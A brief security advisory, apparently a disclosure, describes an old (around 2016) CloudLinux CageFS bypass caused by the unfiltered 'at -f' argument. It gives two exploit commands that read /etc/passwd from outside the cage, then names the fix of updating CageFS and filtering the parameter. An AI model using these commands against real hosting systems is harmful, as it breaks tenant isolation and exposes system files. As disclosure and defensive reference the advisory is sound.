Vulnerability
Affected software: CloudLinux CageFS, unknown version (old vulnerability from around 2016, I no longer have original report)
CloudLinux CageFS can be bypassed by running at
with -f
parameter pointing to a file to read and then displaying job contents.
at
-f
argument is not filtered by proxyexec before executing at
outside CageFS, allowing user inside CageFS to read files outside CageFS.
Exploit
$ at -f /etc/passwd 00:00
$ at -c JOB_NUMBER
Solution
Update CageFS to unaffected version. Check if -f
parameter is filtered in /etc/cagefs/filters/at*.json
.
Timeline
Unknown (old vulnerability from around 2016, I no longer have original report, it was fixed around 2016).